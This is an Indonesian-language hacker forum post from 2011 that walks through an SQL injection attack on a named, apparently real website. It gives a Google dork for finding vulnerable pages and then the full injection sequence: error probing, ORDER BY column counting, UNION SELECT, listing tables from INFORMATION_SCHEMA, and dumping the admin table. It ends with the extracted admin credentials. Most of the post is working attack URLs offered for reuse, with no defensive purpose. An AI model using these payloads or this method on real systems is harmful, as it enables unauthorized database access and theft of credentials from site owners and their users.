GEM-PARK HACKER COMUNITY

Komunitas Hacker Gem-Park
 
IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 SQL injection Vuln

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
AXDV00
Administratos
Administratos
avatar

Jumlah posting : 8
Join date : 19.02.11
Age : 31
Lokasi : Windows/sistem32

PostSubyek: SQL injection Vuln   Sat Feb 19, 2011 4:27 am

DORK Laughing
Code: Select all
inurl:news_detail.php?id=

Contoh target
Code: Select all
http://www.lbpl.in/news_detail.php?id=14
masukian tanda petik (')
kurang lebih seperti di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=14'

lalu muncul error seperti
Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh
Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010--

order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4--

setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--

setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e--

setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya....
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--

nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin

Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....
Kembali Ke Atas Go down
Lihat profil user http://gem-park.indonesianforum.net
 
SQL injection Vuln
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Injection Open Loop vs Close Loop
» WATER INJECTION (WAI) FOR N250R
» N250 Fuel injection Kit PNP
» (Ask) Ninja 250 Injection vs. Carbu
» Knalpot R9 Ninja 250 Injection 2013

Permissions in this forum:Anda tidak dapat menjawab topik
GEM-PARK HACKER COMUNITY :: Hacking Area :: Web Atack-
Navigasi: